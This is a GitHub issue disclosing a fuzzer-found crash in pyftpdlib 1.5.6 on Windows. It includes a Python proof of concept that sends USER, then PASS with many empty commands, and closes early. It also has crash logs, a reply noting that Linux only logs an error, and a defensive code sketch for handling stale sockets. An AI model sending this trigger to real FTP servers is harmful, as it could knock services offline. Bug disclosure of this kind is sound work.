pyftpdlib 1.5.6 remote crash bug on windows #575

Open
dazhouzhou opened this issue Apr 12, 2022 · 1 comment
@dazhouzhou

I used LaiFu to fuzz pyftpdlib on Windows 10 and I found a remote crash bug. The details are as follows:

  • run pyftpdlib

```
python -m pyftpdlib -u fuzzer -P passwd --debug
```

  • run poc.py

```python
import socket

host = "127.0.0.1"
port = 2121

# pkt1 decodes to b"USER fuzzer\r\n"
pkt1 = bytes.fromhex("555345522066757a7a65720d0a")
# pkt2 decodes to b"PASS \r\n" followed by a run of bare CRLF lines (empty commands)
pkt2 = bytes.fromhex("50415353200d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a0d0a")

if __name__ == "__main__":
    # python -m pyftpdlib -u fuzzer -P passwd --debug
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    sock.recv(1024)        # read the 220 banner
    sock.send(pkt1)
    sock.recv(10000)
    sock.send(pkt2)
    sock.recv(10000)
    sock.close()           # close while replies to the empty commands are still pending
```

  • crash log

```
[I 2022-04-12 09:48:49] concurrency model: async
[I 2022-04-12 09:48:49] masquerade (NAT) address: None
[I 2022-04-12 09:48:49] passive ports: None
[D 2022-04-12 09:48:49] poller: 'pyftpdlib.ioloop.Select'
[D 2022-04-12 09:48:49] authorizer: 'pyftpdlib.authorizers.DummyAuthorizer'
[D 2022-04-12 09:48:49] handler: 'pyftpdlib.handlers.type'
[D 2022-04-12 09:48:49] max connections: 512
[D 2022-04-12 09:48:49] max connections per ip: unlimited
[D 2022-04-12 09:48:49] timeout: 300
[D 2022-04-12 09:48:49] banner: 'pyftpdlib 1.5.6 ready.'
[D 2022-04-12 09:48:49] max login attempts: 3
[I 2022-04-12 09:48:49] >>> starting FTP server on 0.0.0.0:2121, pid=11208 <<<
[I 2022-04-12 09:48:51] 127.0.0.1:63793-[] FTP session opened (connect)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 220 pyftpdlib 1.5.6 ready.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <- USER fuzzer
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 331 Username ok, send password.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[fuzzer] <- PASS ******
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: send(), err: [WinError 10053] 你的主机中的软件中止了一个已建立的连接。 (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] [debug] call: close() (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] [debug] call: unregister(); fd was no longer in socket_map (<pyftpdlib.ioloop.Select (fds=1, tasks=2) at 0x27d52002110>)
[I 2022-04-12 09:48:51] 127.0.0.1:63793-[] FTP session closed (disconnect).
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] <-
[D 2022-04-12 09:48:51] [debug] call: initiate_send(); called with no connection (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
[D 2022-04-12 09:48:51] 127.0.0.1:63793-[] -> 500 Command "" not understood.
[D 2022-04-12 09:48:55] [debug] closing IOLoop (<pyftpdlib.ioloop.Select (fds=2, tasks=1) at 0x27d52002110>)
[D 2022-04-12 09:48:55] [debug] call: close() (<FTPHandler(id=2737270377008, addr='127.0.0.1:63793')>)
Traceback (most recent call last):
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\runpy.py", line 196, in _run_module_as_main
    return _run_code(code, main_globals, None,
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\runpy.py", line 86, in _run_code
    exec(code, run_globals)
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\__main__.py", line 122, in <module>
    main()
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\__main__.py", line 116, in main
    ftpd.serve_forever(timeout=2 if os.name == 'nt' else None)
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\servers.py", line 245, in serve_forever
    self.ioloop.loop(timeout, blocking)
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\ioloop.py", line 343, in loop
    poll(timeout)
  File "C:\Users\xzz\AppData\Local\Programs\Python\Python310\lib\site-packages\pyftpdlib\ioloop.py", line 446, in poll
    r, w, e = select.select(self._r, self._w, [], timeout)
OSError: [WinError 10038] 在一个非套接字上尝试了一个操作。
```

@nrathaus

While an error does print out, the process itself doesn't seem to crash or fault (at least on Linux):

```
[E 2024-02-19 09:27:52] unhandled exception in instance <FTPHandler(id=140292931745584, addr='192.168.8.1:35598')>
    Traceback (most recent call last):
      File "/home/x/src/x/venv/lib/python3.10/site-packages/pyftpdlib/ioloop.py", line 232, in call
        self._target(*self._args, **self._kwargs)
      File "/home/x/src/x/venv/lib/python3.10/site-packages/pyftpdlib/handlers.py", line 2534, in callback
        self.add_channel()
      File "/home/x/src/x/venv/lib/python3.10/site-packages/pyftpdlib/ioloop.py", line 795, in add_channel
        self.ioloop.register(self._fileno, self, events)
      File "/home/x/src/x/venv/lib/python3.10/site-packages/pyftpdlib/ioloop.py", line 495, in register
        self._poller.register(fd, events)
    OSError: [Errno 9] Bad file descriptor
[D 2024-02-19 09:27:52] [debug] call: close() (<FTPHandler(id=140292931745584, addr='192.168.8.1:35598')>)
```

The fault seems to be caused by you closing the connection without completing the command, causing the FTP server side to complain.
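
Both tracebacks in this thread end in an invalid-descriptor error from the poller: WinError 10038 (WSAENOTSOCK) out of `select.select()` on Windows, and `[Errno 9] Bad file descriptor` on Linux. The sketch below is an added example, not pyftpdlib's code or fix: it shows one way a select-based loop can catch that error, probe each watched descriptor on its own and evict the dead ones rather than letting the exception end the serve loop. `safe_select`, `prune_stale`, `is_stale_fd_error` and `demo` are hypothetical names, and the socket pairs in `demo` are constructed sample input.

```python
import errno
import select
import socket
WSAENOTSOCK = 10038  # Winsock code shown in the Windows traceback: "not a socket"

def is_stale_fd_error(exc):
    """True when select() failed because a watched descriptor is invalid."""
    if isinstance(exc, ValueError):  # closed socket object, fileno() == -1
        return True
    return exc.errno == errno.EBADF or getattr(exc, "winerror", None) == WSAENOTSOCK

def prune_stale(fds):
    """Probe each fd alone with a zero-timeout select; return (live, stale)."""
    live, stale = [], []
    for fd in fds:
        try:
            select.select([fd], [], [], 0)
            live.append(fd)
        except (OSError, ValueError):
            stale.append(fd)
    return live, stale

def safe_select(readers, writers, timeout):
    """Like select(), but evicts dead descriptors instead of raising."""
    try:
        r, w, _ = select.select(readers, writers, [], timeout)
        return r, w, []
    except (OSError, ValueError) as exc:
        if not is_stale_fd_error(exc):
            raise
    readers[:], dead_r = prune_stale(readers)
    writers[:], dead_w = prune_stale(writers)
    evicted = sorted(set(dead_r + dead_w))
    if not readers and not writers:  # Windows select() rejects three empty lists
        return [], [], evicted
    r, w, _ = select.select(readers, writers, [], timeout)
    return r, w, evicted

def demo():
    """Constructed input: one live socket with data, one closed but still watched."""
    a, b = socket.socketpair()
    c, d = socket.socketpair()
    live_fd, stale_fd = a.fileno(), c.fileno()
    watched = [live_fd, stale_fd]
    b.send(b"x")  # makes live_fd readable
    c.close()     # descriptor is now invalid, yet remains in the watch list
    ready, _, evicted = safe_select(watched, [], 0.5)
    a.close(); b.close(); d.close()
    return ready, evicted, watched, live_fd, stale_fd
```

A real loop would also log each evicted descriptor and close its handler, so that a stale entry is visible in the debug log instead of silently disappearing.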
